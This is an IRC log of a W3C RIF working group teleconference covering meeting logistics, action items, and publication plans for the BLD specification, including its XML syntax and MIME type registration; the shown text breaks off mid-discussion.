Running as a Kubernetes service, Kube-applier fetches declarative configuration files for a Kubernetes cluster from a Git repository and applies them to the pods in the cluster. Whenever changes are made to the definition files, they’re pulled from the repo and applied to the pods in question. In essence, Kube-applier is like Google’s Skaffold, except it’s for managing a whole Kubernetes cluster instead of a single app.
Kube-applier can apply configuration changes on a schedule or on demand. It logs its behavior each time it runs, and it provides Prometheus-compatible metrics so that you’re not in the dark about how it might affect cluster behavior.
Kube-ps1: Smart Kubernetes command prompt
No, Kube-ps1 isn’t a first-gen Sony PlayStation emulator for Kubernetes (although that would be rather nifty). It’s a simple addition to Bash that displays the current Kubernetes context and namespace in the prompt. Kube-shell includes this along with a great many other features, but if all you want is the smarter prompt, Kube-ps1 provides it with little overhead.
Kube-prompt: Interactive Kubernetes client
Another minimal but useful modification to the Kubernetes CLI, Kube-prompt allows you to enter what amounts to an interactive command session with the Kubernetes client. Kube-prompt spares you from having to type
kubectl to prefix every command, and provides autocomplete with contextual information for each command.
Kubespy: Real-time monitoring of Kubernetes resources
Pulumi’s Kubespy is a diagnostic tool that allows you to trace changes to a Kubernetes resource in real time, providing you with a kind of text-view dashboard of the goings-on. For instance, you could watch the changes to a pod’s status as it is booted up: the pod definition being written to Etcd, the pod being scheduled to run on a node, the Kubelet on the node creating the pod, and the pod finally being marked as running. Kubespy can run as a standalone binary or as a plug-in to Kubectl.
Kubeval: Validate Kubernetes configurations
Kubernetes’ YAML configuration files are meant to be human-readable, but that doesn’t always mean they’re human-validatable. It’s easy to miss a dropped comma or fat-fingered name and not find out about it until it’s too late. Better to use Kubeval. Used locally or integrated into your CI/CD pipeline, Kubeval takes in a Kubernetes YAML configuration definition and reports back on its validity. It can produce JSON or TAP-formatted output, and can even parse the source templates referenced in a Helm chart configuration without needing additional prompting.
Kube-ops-view: Dashboard for multiple Kubernetes clusters
Kubernetes has a useful dashboard for general-purpose monitoring, but the Kubernetes community is experimenting with other ways to present data usefully to the Kubernetes admin. Kube-ops-view is one such experiment; it provides a broad at-a-glance view of multiple Kubernetes clusters, rendered graphically, so one can see at a glance the CPU and memory usage and status of pods across a cluster. Note that it doesn’t allow you to invoke any commands; it’s strictly for visualization. But the visualizations it provides are striking and efficient, born for a wall monitor in your operations center.
Rio: App deployment engine for Kubernetes
Rio, a project of Rancher Labs, implements common application deployment patterns in Kubernetes such as continuous delivery from Git and A/B or blue/green deployments. Rio can deploy a new version of your app whenever you make a commit, helpfully managing complexities like DNS, HTTPS, and service meshes.
Stern and Kubetail: Log tailing for Kubernetes
Stern lets you produce color-coded output (as per the
tail command) from pods and containers in Kubernetes. It’s a quick way to pipe all the output from multiple resources into a single stream that can be read at a glance. At the same time, you have an at-a-glance way (the color coding) to distinguish the streams.
Kubetail similarly aggregates logs from multiple pods into a single stream, color-coding different pods and containers. But Kubetail is a Bash script, so it requires nothing more than a shell. | https://www.infoworld.com/article/3488817/12-tools-that-make-kubernetes-easier.html | CC-MAIN-2021-43 | refinedweb | 979 | 50.67 |
Directs all graphics requests to an Fl_Image. More...
#include <Fl_Image_Surface.H>
Directs all graphics requests to an Fl_Image.
After creation of an Fl_Image_Surface object, call set_current() on it, and all subsequent graphics requests will be recorded in the image. It's possible to draw widgets (using Fl_Image_Surface::draw()) or to use any of the Drawing functions or the Color & Font functions. Finally, call image() on the object to obtain a newly allocated Fl_RGB_Image object.
Fl_GL_Window objects can be drawn in the image as well.
Usage example:
Constructor with optional high resolution.
Returns the name of the class of this object.
Use of the class_name() function is discouraged because it will be removed from future FLTK versions.
The class of an instance of an Fl_Device subclass can be checked with code such as:
Reimplemented from Fl_Surface_Device.
Draws a widget in the image surface.
Draws a window and its borders and title bar to the image drawing surface.
Returns a possibly high resolution image made of all drawings sent to the Fl_Image_Surface object.
The Fl_Image_Surface object should have been constructed with Fl_Image_Surface(W, H, 1). The returned image is scaled to a size of WxH drawing units and may have a pixel size twice as wide and high. The returned object should be deallocated with Fl_Shared_Image::release() after use.
Returns an image made of all drawings sent to the Fl_Image_Surface object.
The returned object contains its own copy of the RGB data. Prefer Fl_Image_Surface::highres_image() if the surface was constructed with the highres option on.
Make this surface the current drawing surface.
This surface will receive all future graphics requests.
Reimplemented from Fl_Surface_Device. | http://www.fltk.org/doc-1.3/classFl__Image__Surface.html | CC-MAIN-2017-47 | refinedweb | 271 | 59.3 |
So, I may have to backtrack on what I was saying earlier. Specifically, I called
clisp a toy shell, and I called the machine I'm currently typing this on a toy machine. I did this because, having just installed it and spent a grand total of five minutes poking around, I assumed
- it wouldn't run some programs properly
- my scripts would now be useless
- cd wouldn't work
- I'd lose tab completion on files
- there would be no gains to offset all the losses
- it would be a pain in the ass to use a regular shell when I hit the limits of
clisp
It turns out that most of those don't apply. I did actually lose tab-completion when working with files, but that's it. Pretty much every program that I want to run typically[1] works just as well from
clisp as it does in
bash, scripts run exactly the same as under a standard shell when you use
run-shell-command,
cd is actually a function defined in
clisps'
cl-user, and when I need to run a regular bash for whatever reason
eshell can pickup the slack.
There's also a few non-obvious things I gain to offset losing filename tab completion.
First off, I get to define helper functions at my command line. One situation I've already found this useful in is copying files off my previous computer. It's a fairly specific situation, because I didn't want to sync a complete directory, but rather surgically copy over some 12 or 13 irregularly named files. That would have taken 12 or 13 separate scp calls. In regular shell, I'd have to do something like write a script for it. Having an actual language available let me pull out my first trick
> (defun cp-file (file-name) (run-shell-command (format nil "scp inaimathi@other-machine:.emacs.d/~a .emacs.d/"))) CP-FILE > (cp-file "example.el")
This isn't specific to
clisp, obviously. I assume that any language shell you use could pull the same trick. Still, having the ability to define helpers on the fly is something I occasionally wish I had[2].
Another thing that I imagine would work in any language shell, is an easier way of defining shell scripts. I wrote a little set of ui utilities a while ago, one of which is
pack, a translator for various archive formats so that I can write
pack foo rather than
tar -xyzomgwtfbbq foo.tar.gz foo
#!/usr/bin/ruby require 'optparse' require 'pp' require 'fileutils' archive_types = { "tar" => ["tar", "-cvf"], "tar.gz" => ["tar", "-zcvf"], "tgz" => ["tar", "-zcvf"], "tar.bz2" => ["tar", "-jcvf"], "zip" => ["zip"] } ########## parsing inputs options = { :type => "tar", :excluded => [".git", ".gitignore", "*~"] } optparse = OptionParser.new do|opts| opts.on("-e", "--exclude a,b,c", Array, "Specify things to ignore. Defaults to [#{options[:excluded].join ", "}]") do |e| options[:excluded] = e end opts.on("-t", "--type FILE-TYPE", "Specify archive type to make. Defaults to '#{options[:type]}'. Supported types: #{archive_types.keys.join ", "}") do |t| options[:type] = t end end optparse.parse! ########## ARGV.each do |target| if not archive_types[options[:type]] puts "Supported types are #{archive_types.keys.join ", "}" exit elsif options[:type] == "zip" exclude = options[:excluded].map{|d| ["-x", d]}.flatten else exclude = options[:excluded].map{|d| ["--exclude", d]}.flatten end fname = target.sub(/\/$/, "") args = archive_types[options[:type]] + [fname + "." + options[:type], fname] + exclude system(*args) end
So that was necessary in bash, and because shell scripts can't easily share data, the companion script,
unpack, had to define almost the exact same set of file-extension-to-command/option mappings[3]. If I'm using
clisp, I could instead write
(defun pack (file-name &key (type tar) (exclude '(".git" ".gitignore" "*~"))) (pack-file (make-instance type :file-name file-name :excluded exclude))) (defmethod pack-file ((f tar.gz)) (run-shell-command (format nil "tar -zcvf ~@[~{--exclude ~a~^~}~]~a" (excluded f) (file-name f))))
and be done with it[4]. This is a similar, but more extreme version of the previous point. Instead of writing shell-scripts, I can now write functions, macros or methods. These are smaller conceptual units and deal with inputs more easily, letting me focus on expressing what I want the script to do. In fact looking at language shells this way makes it obvious that things like
optparse are just hacks to get around the way that scripts accept arguments.
The last cool thing is to do with the package management. I could be wrong about this, but I don't think the Lisp notion of
in-package exists elsewhere. So I can define a package like
(defpackage :apt-get (:use :cl)) (defun install (&rest packages) (su-cmd "apt-get install ~{~(~a~)~^ ~}" packages)) (defun update () (su-cmd "apt-get update")) (defun search (search-string) (cmd "apt-cache search '~a'" search-string))
where the
cmds are defined as something like
(defmacro cmd (command &rest args) `(run-shell-command (if args `(format nil ,command ,@args) `command))) (defmacro su-cmd (command &rest args) `(run-shell-command (format nil "su -c \"~a\"" (if args `(format nil ,command ,@args) `command))))
The issue I'd have with defining these in, for example a Python shell, is that I'd then have a choice. I could either
import the file and put up with typing out the name of the module at every invocation, or I could
import install, update, search from and then hope that I don't have to define conflicting functions[5]. In a Lisp shell, I can define it and load it and then do
(in-package :apt-get) when I need to do a series of commands relating to installing new modules.
Now all of these, clisp-exclusive or not, are small syntactic fixes that work around basic shell annoyances. To the point that you're probably asking yourself what the big deal is. It's basically the same reason that macros are awesome; they get rid of inconsistencies at the most basic levels of your code, and the increased simplicity you get that way has noticeable impacts further up the abstraction ladder. The sorts of things that look like minor annoyances can add up to some pretty hairy code, and cutting it off at the root often saves you more trouble than you'd think.
I'll admit that tab completion on file names is a pretty big thing to lose[6], but the things I outline above are mighty tempting productivity boosts to my shell. To the point that I'm fairly seriously debating switching over on my main machine. Between Emacs, StumpWM/Xmonad and Conkeror, it's not really as if someone else can productively use my laptop anyway. Adding an esoteric shell really doesn't seem like it would be a big negative at this point.
Footnotes
1 - [back] - Including fairly complex CLI stuff like
wicd-curses,
mplayer and
rsync --progress
2 - [back] - And now, I do
3 - [back] - Except for compression rather than expansion
4 - [back] - Defining methods for each archive type, and the appropriate class, obviously
5 - [back] - Or import another module that defines new ones with the same names
6 - [back] - And I'm going to put a bit of research into not losing it | http://langnostic.blogspot.com/2012/01/lisp-shell-followup.html | CC-MAIN-2017-39 | refinedweb | 1,206 | 61.36 |
Introduction
Node.
Node 12 new & improved
Why is JavaScript about to get a lot better? Node.js 12 just dropped a few months ago.
On April 23rd, 2019, Node.js 12 officially launched, and JavaScript enthusiasts everywhere rejoiced. And let’s be clear, this isn’t just a regular old version update, this is a big overhaul with some major upgrades, let’s go down the list of highlights.
V8 JavaScript engine upgrades
In addition to the expected performance tweaks and improvements that come with every new version of the JavaScript V8 engine, there are some really noteworthy upgrades this time around. These include:
- Zero-cost async stack traces – this will serve to enrich the
error.stackproperty with asynchronous call frames without adding extra runtime to the V8 engine
- Faster calls with arguments mismatch – in the past, V8 had to handle all function calls with too many or too few parameters the same way, which came at a performance cost. Now, it’s smart enough to know when it can skip this step, reducing call overhead up to 60%
- Faster async functions and promises – yes indeed, using async is actually two extra microticks faster than promises now, if you needed a reason besides the more synchronous-style syntax async / await provides to developers unfamiliar with promises
- Faster JavaScript parsing – at startup of a web page, just under 10% of the V8 time is spent parsing JS. The latest JavaScript parser released has improved parsing speed by up to 30% on desktops
More secure security with TLS 1.3
TLS, which stands for transport layer security, is how Node handles encrypted stream communication.
With the release of Node.js 12, TLS gets an upgrade to version 1.3, which sounds insignificant, but is actually a major update, with numerous performance and security enhancements. Although it sounds counterintuitive at first, TLS 1.3 is actually a simpler protocol to implement than TLS 1.2, making it more secure, easier to configure, and quicker to negotiate sessions between applications.
By using TLS 1.3, Node apps will have increased end-user privacy while also improving the performance of requests by reducing the time required for the HTTPS handshake.
Bottom line: better security for everyone using it and less latency between communicating services. That’s a major win to me.
Properly configured default heap limits
Now, let’s talk about some lower level improvements. Up to this point, the JavaScript heap size defaulted to the max heap sizes set by V8 for use with browsers, unless manually configured otherwise. With the release of Node.js 12, the JS heap size will be configured based on available memory, which ensures Node doesn’t try to use more memory than is available and terminate processes when its memory is exhausted.
Say goodbye to out of memory errors – at least some of the time – when processing large amounts of data. The old
--max-old-space-size flag will still be available to set a different limit if needed, but hopefully, this feature will reduce the need for setting the flag.
The default http parser becomes llhttp
Unbeknownst to many (myself included), the current
http_parser library used in Node has been extremely difficult to maintain and improve upon, which is why llhttp was born. The project is a port of http_parser to TypeScript, which is then run through llparse to generate the C or bitcode output.
Turns out, llhttp is faster than http_parser by 156%, it’s written in fewer lines of code, and all performance optimizations are generated automatically, as opposed to http_parser’s hand-optimized code.
In Node.js 12, they’ve decided to switch the default parser to llhttp for the first time, and more thoroughly, put it to the test. Let’s hope it continues to perform well when lots of different applications with lots of different needs are trying it out.
Diagnostic reports on demand
Switching the conversation to debugging, there’s a new experimental feature in Node.js 12 allowing users to generate a report on demand or when certain trigger events occur.
This kind of real-time reporting can help diagnose problems in production including crashes, slow performance, memory leaks, high CPU usage, unexpected errors, etc. – the kind of stuff that usually takes hours if not days to debug, diagnose and fix.
Integrated heap dumps
Another feature in this release around heaps, sure to speed up the debugging process, is integrated heap dumps, which ships with Node.js 12, already built in.
Now there’s no need to install new modules to investigate memory issues – just tell Node what kind of JSON-formatted diagnostic summary you want via the command line or an API call and parse through all of the info you can handle.
Native modules get easier in Node.js
Stepping back from the low-level improvements, there’s some cool stuff also coming for developers and module makers within the Node ecosystem.
Making and building native modules for Node continues to improve, with changes that include better support for native modules in combination with worker threads, as well as the version 4 release of the N-API, which makes.
Worker threads are coming – the experimental flag has been removed
Worker threads, while they’ve been around since Node 10, no longer require a flag to be enabled – they’re well on their way to moving out of the experimental phase. Prior to Node.js 11.7.0, you could not access the worker thread module unless you started
node with the
--experimental-worker flag in the command line.
$. ([eval]-wrapper:6:22) at Module._compile (internal/modules/cjs/loader.js:721:30) at evalScript (internal/bootstrap/node.js:720:27) $ $ node --experimental-worker -e "require('worker_threads'); console.log('success');" success $
Workers really shine when performing CPU-intensive JavaScript operations, they won’t help much with I/O-intensive work. Node’s built-in asynchronous I/O operations are more efficient than Workers can be.
Startup time improvements
Node.js 11 reduced startup time of worker threads almost 60% by using built-in code cache support.
Node 12 has built upon this idea to generate the code cache for built-in libraries in advance at build time, allowing the main thread to use the code cache to start up the initial load of any built-in library written in JavaScript.
The end result is another 30% speedup in startup time for the main thread, and your apps will load for users faster than ever before.
ES6 module support, it’s almost here 🙌
I saved the best for last. One of the most exciting features to me is ES6 module support – the thing so many of us have been waiting for. This feature is still experimental, and the Node team is looking for feedback from people trying it out, but just imagine being able to transition seamlessly from front-end to back-end JavaScript with nary a care in the world.
Here’s the best of what the latest version of
-–experimental-modules contains:
- ES2015 import statements that reference JavaScript files with relative URLs
./examples.js, absolute URLs, package names
example-packageor paths within packages
example-package/lib/examples.jsare all supported.
// relative urls ‘./examples.js’ // absolute URLs ‘’ // package names ‘example-package’ // paths within packages example-package/lib/examples.js
- Import and export syntax in
.jsfiles works. Finally, devs can specify default exports
import test from
'./examples', named exports
import {example1, example2} from './examples'and namespace exports
import * as samples from './examples'just as we’ve been doing in traditional JavaScript since ES6 came about.
// default imports / exports import test from ‘./examples’ // named imports / exports import {example1, example2} from ‘./examples’ // namespace exports import * as samples from ‘./examples’
- Add
"type": "module"to the
package.jsonfor a project, and Node.js will treat all
.jsfiles in the project as ES modules. This approach allows Node to use the
package.jsonfor package-level metadata and configuration, similar to how it’s already used by Babel and other bundling and configuration tools.
- Explicit extensions for files will be treated as modules with the
.mjsending, and files to be treated as CommonJS with the
.cjs. These are files which still use
requireand
module.exports-type syntax.
Hallelujah! I’m really stoked for when this comes out from behind the flag for full adoption.
New compiler & platform minimum standards for Node 12
And last but not least, there are new requirements for running Node itself.
With newer features coming to Node.js via internal improvements and upgrades to the C++ of the V8 engine, comes new minimum requirements for Node.js 12. The codebase now needs a minimum of GCC 6 and glibc 2.17 on platforms other than macOS and Windows. Binaries released use this new toolchain minimum and include new compile-time performance and security enhancements.
If you’re using Mac or Windows machines, you should be fine: Windows minimums are the same for running Node.js 11, Mac users will need at least Xcode 8 and a minimum macOS of 10.10 “Yosemite”. Linux compatible binaries from nodejs.org will support Enterprise Linux 7, Debian 8 and Ubuntu 14.04, but custom toolchains on systems not natively supporting GCC 6 may be necessary. I’m sure you’ll figure out what’s needed quickly enough.
Conclusion
Yes, Node.js is only 10 years old, yes, it’s single threaded, and yes, it is not as widely adopted and leveraged as some other programming languages, but Node boasts something no other programming language can claim: it is built with JavaScript, and can run both on the client and server side.
And the teams and companies working to support and improve Node are some of the best and brightest in the business. Node has continued to learn from core JavaScript and other languages, cherry-picking the right pieces to incorporate into itself, becoming a better and better platform for developers and applications, alike.
Node.js 12 brings about some extremely exciting improvements like ES6 module support, better application security, and quicker startup times. Although it will not go into LTS (long term support) mode until October 2019 I’m pumped to dig into these new features and see what else the team can dream up to continue making this platform a great server-side solution. “Node.js 12: The future of server-side JavaScript”
Clarification towards the end… Node is *NOT* single-threaded. The main JS runs in an event loop on a single thread. Async I/O (and often other compiled modules) run within a thread pool. Node doesn’t run server and browser, but the code can run on both.
Clarification, not all async events are using thread pool, many of them use low level underlying OS functionality, but not separate thread polling. Http module is the best example.
Also, node doesn’t have to “produce dynamic web content”. It does any type of server-side (or even command line) work. It can power a websocket server, PDF export service, host an event/message system or do any other work not related to rendering web pages.
Thanks for sharing this. | https://blog.logrocket.com/node-js-12/ | CC-MAIN-2019-43 | refinedweb | 1,857 | 55.13 |
IRC log of rif on 2008-07-01
Timestamps are in UTC.
14:46:48 [RRSAgent]
RRSAgent has joined #rif
14:46:48 [RRSAgent]
logging to
14:46:56 [ChrisW]
rrsagent, make minutes
14:46:56 [RRSAgent]
I have made the request to generate
ChrisW
14:47:04 [ChrisW]
zakim, this will be rif
14:47:04 [Zakim]
ok, ChrisW; I see SW_RIF()11:00AM scheduled to start in 13 minutes
14:47:20 [ChrisW]
Meeting: RIF Telcon 1-Jul-2008
14:47:27 [ChrisW]
Chair: Chris Welty
14:47:48 [ChrisW]
ChrisW has changed the topic to: 1 July RIF telecon agenda
14:47:53 [ChrisW]
Agenda:
14:48:06 [ChrisW]
rrsagent, make logs public
14:48:13 [ChrisW]
zakim, clear agenda
14:48:13 [Zakim]
agenda cleared
14:48:39 [ChrisW]
agenda+ Admin
14:48:50 [ChrisW]
agenda+ Liason
14:48:56 [ChrisW]
agenda+ F2F11
14:49:00 [ChrisW]
agenda+ Action Review
14:49:10 [ChrisW]
agenda+ Publication plans
14:49:16 [ChrisW]
agenda+ PRD
14:49:22 [ChrisW]
agenda+ ISSUE-61 (casting)
14:49:26 [ChrisW]
agenda+ AOB
14:49:35 [ChrisW]
next agendum
14:49:51 [ChrisW]
zakim, next agendum
14:49:51 [Zakim]
agendum 1 was just opened, ChrisW
14:50:59 [csma]
csma has joined #rif
14:51:09 [csma]
list agenda
14:59:22 [sandro]
zakim, who is on the call?
14:59:22 [Zakim]
apparently SW_RIF()11:00AM has ended, sandro
14:59:24 [Zakim]
On IRC I see csma, RRSAgent, ChrisW, sandro, Harold, trackbot, Zakim
14:59:48 [Zakim]
SW_RIF()11:00AM has now started
14:59:50 [Zakim]
+??P6
15:00:14 [csma]
zakim, ??P6 is me
15:00:14 [Zakim]
+csma; got it
15:00:48 [Zakim]
+Sandro
15:00:50 [Zakim]
-Sandro
15:00:50 [Zakim]
+Sandro
15:00:51 [josb]
josb has joined #rif
15:00:56 [Zakim]
+ +39.047.101.aaaa
15:01:27 [mdean]
mdean has joined #rif
15:02:06 [StellaMitchell]
StellaMitchell has joined #rif
15:02:10 [Zakim]
+Mike_Dean
15:02:41 [Zakim]
+[IBM]
15:02:46 [ChrisW]
zakim, ibm is temporarily me
15:02:46 [Zakim]
+ChrisW; got it
15:03:19 [AxelPolleres]
AxelPolleres has joined #rif
15:03:30 [Zakim]
+[IBM]
15:03:35 [StellaMitchell]
zakim, ibm is temporarily me
15:03:35 [Zakim]
+StellaMitchell; got it
15:04:04 [csma]
Axel, would you like to scribe?
15:04:14 [ChrisW]
zakim, who is on the phone?
15:04:14 [Zakim]
On the phone I see csma, Sandro, josb, Mike_Dean, ChrisW, StellaMitchell
15:04:19 [LeoraMorgenstern]
LeoraMorgenstern has joined #rif
15:04:49 [Zakim]
+LeoraMorgenstern
15:05:48 [Zakim]
+??P43
15:06:11 [AxelPolleres]
:-)
15:06:23 [AxelPolleres]
scribe: Axel Polleres
15:06:32 [AxelPolleres]
scribenick: AxelPolleres
15:06:45 [ChrisW]
Harold, are you joining?
15:06:50 [AxelPolleres]
csma: Any agenda changes?
15:07:00 [csma]
15:07:01 [AxelPolleres]
... no
15:07:13 [ChrisW]
PROPOSED: Accept last week's minutes
15:07:16 [AxelPolleres]
... objections to accept the minutes of last week?
15:07:18 [ChrisW]
RESOLVED: Accept last week's minutes
15:07:22 [AxelPolleres]
... none. accepted.
15:07:49 [AxelPolleres]
ChrisW: were minutes two weeks ago accepted... yes.
15:08:01 [csma]
next item
15:08:14 [AxelPolleres]
TOPIC: Liaison
15:08:49 [AxelPolleres]
csma: Wehad an OMG PRR meeting last week, deadline for final report has been moved 3 months from now.
15:09:05 [AxelPolleres]
... we try to delay PRR to "wait" for RIF PRD.
15:09:07 [csma]
next item
15:09:20 [AxelPolleres]
TOPIC: F2F11
15:09:38 [AxelPolleres]
csma: date is fixed.
15:09:52 [sandro]
Sep 26-27 (Friday/Saturday)
15:10:10 [AxelPolleres]
ChrisW: Yes, it is: Sep 26-27.
15:10:34 [AxelPolleres]
csma: location: Manhattan or Boston.
15:10:41 [josb]
+1 Manhattan
15:10:53 [AxelPolleres]
+/-0
15:10:56 [josb]
s/Boston/Hawthorne/
15:10:57 [Hassan]
Hassan has joined #rif
15:11:18 [Zakim]
+ +33.2.72.26.aabb
15:11:41 [AxelPolleres]
csma and sandro discussing hotel prices in NY.
15:11:41 [Zakim]
+Gary_Hallmark
15:12:17 [AxelPolleres]
ChrisW: Hotels considerably more xepensive, also transport.
15:13:45 [MichaelKifer]
MichaelKifer has joined #rif
15:13:48 [AxelPolleres]
TOPIC: Action review
15:13:57 [ChrisW]
zakim, next item
15:13:57 [Zakim]
agendum 5. "Publication plans" taken up [from ChrisW]
15:14:05 [ChrisW]
zakim, list agenda
15:14:05 [Zakim]
I see 4 items remaining on the agenda:
15:14:06 [Zakim]
5. Publication plans [from ChrisW]
15:14:06 [Zakim]
6. PRD [from ChrisW]
15:14:07 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
15:14:07 [Zakim]
8. AOB [from ChrisW]
15:14:10 [sandro]
15:14:17 [ChrisW]
zakim, take up item 4
15:14:17 [Zakim]
agendum 4. "Action Review" taken up [from ChrisW]
15:14:25 [GaryHallmark]
GaryHallmark has joined #rif
15:14:44 [AxelPolleres]
Action 534: CONTINUED.
15:14:44 [trackbot]
Sorry, couldn't find user - 534
15:15:27 [Zakim]
+ +1.631.833.aacc
15:15:41 [ChrisW]
zakim, who is on the phone?
15:15:41 [Zakim]
On the phone I see csma, Sandro, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, Hassan (muted), Gary_Hallmark, +1.631.833.aacc
15:15:56 [MichaelKifer]
zakim, aacc is me
15:15:56 [Zakim]
+MichaelKifer; got it
15:16:00 [AxelPolleres]
Action-530: CONTIINUED.
15:16:00 [trackbot]
ACTION-530 Review final BLD LC draft notes added
15:16:13 [MichaelKifer]
zakim, mute me
15:16:13 [Zakim]
MichaelKifer should now be muted
15:16:46 [ChrisW]
Harold, are you joining?
15:17:20 [AxelPolleres]
Leora: The resolutions in the documents are not always clear.
15:17:29 [MichaelKifer]
harold will be late
15:18:01 [AxelPolleres]
... e.g.
15:18:43 [AxelPolleres]
csma: references to DTB have been clarified by last weeks resolution.
15:19:03 [AxelPolleres]
Leora: When will BLD be frozen enough to complete the action?
15:20:58 [josb]
the RDF namespace is already used for XMLLiteral
15:21:20 [conan]
conan has joined #rif
15:21:24 [csma]
15:21:59 [sandro]
15:22:12 [Zakim]
+Mark_Proctor
15:22:18 [AxelPolleres]
ACTION-521: CONTINUED.
15:22:18 [trackbot]
ACTION-521 Work with Jie Bao (of OWL-WG) to put together draft on rif:text/owl:internationalizedText notes added
15:22:38 [josb]
q+
15:22:53 [ChrisW]
action: sandro to work on getting access to OWL wiki for internationalized text article
15:22:53 [trackbot]
Created ACTION-535 - Work on getting access to OWL wiki for internationalized text article [on Sandro Hawke - due 2008-07-08].
15:23:39 [AxelPolleres]
josb: sandro, question about the previous item. two links on the OWL side on that side, what is the difference?
15:24:31 [AxelPolleres]
ACTION-517: continued.
15:24:32 [trackbot]
ACTION-517 Review FLD [june 23] notes added
15:24:40 [josb]
q-
15:24:56 [AxelPolleres]
... all other review actions also continued.
15:25:15 [AxelPolleres]
ACTION-510: continued.
15:25:15 [trackbot]
ACTION-510 Remove UPDATE, EXECUTE and ASSIGN from PRD notes added
15:26:51 [ChrisW]
zakim, list agenda
15:26:51 [Zakim]
I see 4 items remaining on the agenda:
15:26:53 [Zakim]
5. Publication plans [from ChrisW]
15:26:53 [Zakim]
6. PRD [from ChrisW]
15:26:54 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
15:26:54 [Zakim]
8. AOB [from ChrisW]
15:26:57 [ChrisW]
zakim, take up item 5
15:26:57 [Zakim]
agendum 5. "Publication plans" taken up [from ChrisW]
15:27:01 [AxelPolleres]
sandro: no point to talk about actions on metadata without harold and michael.
15:27:11 [AxelPolleres]
TOPIC: Publication plan.
15:27:15 [MichaelKifer]
zakim, unmute me
15:27:15 [Zakim]
MichaelKifer should no longer be muted
15:27:45 [AxelPolleres]
Michael: We are still working on some aspects of PS to XML translation.
15:28:01 [AxelPolleres]
... made some signnificant improvements, not yet finished.
15:28:32 [AxelPolleres]
csma: you can use some example from PRD, maybe.
15:28:43 [josb]
q+
15:29:11 [AxelPolleres]
Michael: we define a recursive function. but still have left the translation of Prefix, Base, will take only a couple of days more.
15:29:33 [AxelPolleres]
... should be doable in one or two days, depends on Harold's schedule.
15:29:36 [csma]
ack josb
15:30:07 [AdrianP]
AdrianP has joined #rif
15:30:42 [AxelPolleres]
josb: looked over the XML translation... looks good. but I thought we don't need to define translations for Base and Prefix.
15:30:59 [AxelPolleres]
Michael: well, they are part of the language, so we should explain it.
15:31:13 [AxelPolleres]
... I don't see how we get around this.
15:31:22 [Zakim]
+[NRCC]
15:31:35 [AxelPolleres]
... we have to define the translation to entity definitions.
15:31:58 [Harold]
zakim, [NRCC] is me
15:31:58 [Zakim]
+Harold; got it
15:32:07 [AxelPolleres]
Harold: (just joined) looked it up, it can be done.
15:32:24 [AxelPolleres]
csma: outr question was, when would we have it finished?
15:32:33 [AxelPolleres]
s/outr/our/
15:32:43 [AxelPolleres]
Harold: two days
15:33:02 [AxelPolleres]
csma: so we can freeze BLD on Friday.
15:33:22 [AxelPolleres]
Harold: yes.
15:33:43 [AxelPolleres]
josb: we need two things entities and xml-namespaces for Prefix.
15:34:20 [AxelPolleres]
Harold: ... no it is all only between the tags, so we don't need namespaces.
15:34:50 [Harold]
For pretty print, switch to XML:
15:34:50 [Harold]
Then view:
15:34:50 [Harold]
Harold
15:34:56 [csma]
q?
15:35:03 [AxelPolleres]
Michael: They do XML namespaces in OWL/XML, but it doesn't seem necessary.
15:35:34 [AxelPolleres]
Harold: I have pasted some links that illustrate this.
15:36:03 [AxelPolleres]
... the namespace definitions don't seem to be necessary in those examples.
15:36:17 [AxelPolleres]
ChrisW: we seem to all agree here.
15:36:50 [AxelPolleres]
josb: why do we need entities/namespaces at all? we can just expand at preprocessing.
15:36:55 [AxelPolleres]
q+
15:37:17 [AxelPolleres]
... but I am not very concerned with it.
15:38:06 [AxelPolleres]
Michael: We can state that all prefixes should be preprocessed. Don't know whether this is simpler, though.
15:38:08 [csma]
ack axel
15:39:57 [csma]
q?
15:40:24 [AxelPolleres]
I tend more towards describing the preprocessing of prefixes.
15:40:50 [AxelPolleres]
josb: would prefer preprocessing, but don't oppose other option (entity definitions)
15:41:08 [AxelPolleres]
Harold: preprocessing can be implemented in the document quickly.
15:41:27 [AxelPolleres]
... we also need to clarify the MIME type question.
15:42:05 [AxelPolleres]
sandro: We need a MIME type registration.
15:42:24 [MichaelKifer]
zakim, mute me
15:42:24 [Zakim]
MichaelKifer should now be muted
15:42:46 [AxelPolleres]
harold: I just replaced RDF by RIF in some template from RDF for that.
15:43:04 [josb]
q+
15:43:16 [AxelPolleres]
sandro: when we go to LC, we have to have the MIME type registered/acknowledged.
15:43:28 [AxelPolleres]
csma: who can finish that?
15:43:33 [csma]
ack josb
15:43:39 [AxelPolleres]
sandro: none of us has experience with that.
15:43:55 [josb]
15:44:16 [Harold]
Michael and all, Ys we would need to add a sentence or two saying something: The presentation syntax for Base and Prefix will be preprocessed by expanding the Base and Prefix names into full URIs. Only that expanded version will then be translated to XML as shown in this section.
15:44:32 [AxelPolleres]
josb: do we need some formal/informal registration with IANA?
15:44:45 [ChrisW]
Harold - Just put that in the function
15:44:55 [AxelPolleres]
... RDF had it in a deparate document.
15:45:13 [josb]
s/deparate/separate/
15:45:17 [AxelPolleres]
sandro: doesn't need to be a separate doc, can be an appendix in BLD.
15:45:40 [AxelPolleres]
Harold: need some help/feedback on the XML Schema.
15:45:52 [ChrisW]
action: sandro to finish mime type for BLD
15:45:52 [trackbot]
Created ACTION-536 - Finish mime type for BLD [on Sandro Hawke - due 2008-07-08].
15:46:24 [AxelPolleres]
csma: who will finish the mime type stuff?
15:46:31 [josb]
q+
15:46:36 [AxelPolleres]
sandro: will do it/clarify it by friday.
15:47:26 [Harold]
RE: Media-Type (MIME type) for RIF
15:48:28 [AxelPolleres]
Harold, josb, axel: does not affect SWC and DTB.
15:48:36 [csma]
ack josb
15:48:37 [ChrisW]
ack josb
15:49:02 [AxelPolleres]
josb: can do a review on Wed July 9th.
15:49:07 [csma]
PROPOSED: Mark "external frames" AT RISK in BLD
15:49:15 [Harold]
RE: Media-Type (MIME type) for RIF
15:50:35 [AxelPolleres]
csma: we want to mark external frames at risk in bld since we don't understand what they are.
15:50:49 [ChrisW]
ACTION: harold to mark external frames "at risk" in BLD
15:50:49 [trackbot]
Created ACTION-537 - Mark external frames \"at risk\" in BLD [on Harold Boley - due 2008-07-08].
15:51:14 [csma]
RESOLVED: Mark "external frames" at risk in BLD
15:52:00 [AxelPolleres]
csma: when can you do the review, leora?
15:52:08 [AxelPolleres]
leora: over the weekend.
15:53:44 [AxelPolleres]
